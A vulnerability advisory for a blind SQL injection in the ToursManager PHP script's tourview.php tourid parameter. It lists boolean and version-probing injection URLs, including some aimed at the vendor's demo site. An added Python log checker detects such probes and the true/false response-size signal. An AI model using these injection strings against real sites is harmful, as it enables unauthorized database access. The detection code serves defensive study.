ToursManager (tourview.php tourid) Blind SQL Injection Vulnerability

2008-11-21T00:00:00
ID SSV:10074
Type seebug
Reporter Root
Modified 2008-11-21T00:00:00

Description

No description provided by source.

[>] Name:-->             ToursManager PhP Script <= Blind Sql Injection
 
[>] Discovered by:-->  XaDoS
 
[>] ContacT m&:-->     xados[at]hotmail.it
 
[>] Site:-->                http://www.toursmanager.com
 
#########
 
[■] £XpLoIT:
 
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1--   (true)
 
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0--   (false)
 
Version:
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5  (true)
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4  (false)
 
V=> 5.x.x XD
 
#########
[■] D&M0:
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5 
 
#########
 
[■] Th4Nks T0:
 
\> Boom3rang </ (very kind) ;-)
\> Langy  </
\> Str0ke </
 
#########
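
Added example (not part of the original advisory or the ToursManager code): a log check that flags non-numeric tourid values sent to tourview.php and reports clients whose flagged requests returned differing response sizes, which is the true/false signal the advisory relies on. The log lines, IP addresses and response sizes are constructed, and it is an assumption that legitimate tourid values are plain integers.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Nov/2008:10:00:01 +0000] "GET /tourview.php?tourid=2 HTTP/1.1" 200 5120
203.0.113.9 - - [21/Nov/2008:10:00:05 +0000] "GET /tourview.php?tourid=2%20and%201=1-- HTTP/1.1" 200 5120
203.0.113.9 - - [21/Nov/2008:10:00:06 +0000] "GET /tourview.php?tourid=2%20and%201=0-- HTTP/1.1" 200 812
203.0.113.9 - - [21/Nov/2008:10:00:09 +0000] "GET /tourview.php?tourid=2+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120
198.51.100.4 - - [21/Nov/2008:10:01:00 +0000] "GET /index.php?page=2 HTTP/1.1" 200 900
"""

# client, request target, status code, response size
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) (\d+|-)')

def find_tourid_probes(log_text, script="tourview.php", param="tourid"):
    """Return (client, decoded value, response size) for non-numeric tourid values."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, _status, size = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs splits each pair on the first '=' and URL-decodes the value,
        # so "2%20and%201=1--" is seen as "2 and 1=1--".
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if not re.fullmatch(r"[0-9]+", value):  # assumption: ids are plain integers
                hits.append((client, value, size))
    return hits

def clients_with_size_oracle(hits):
    """Clients whose flagged requests produced more than one response size."""
    sizes = {}
    for client, _value, size in hits:
        sizes.setdefault(client, set()).add(size)
    return sorted(c for c, s in sizes.items() if len(s) > 1)

if __name__ == "__main__":
    found = find_tourid_probes(SAMPLE_LOG)
    for client, value, size in found:
        print(f"{client}  tourid={value!r}  bytes={size}")
    print("size oracle observed for:", clients_with_size_oracle(found))
```

The same integer-only rule can be enforced on the server before the value reaches the query, which removes the condition the flagged requests depend on.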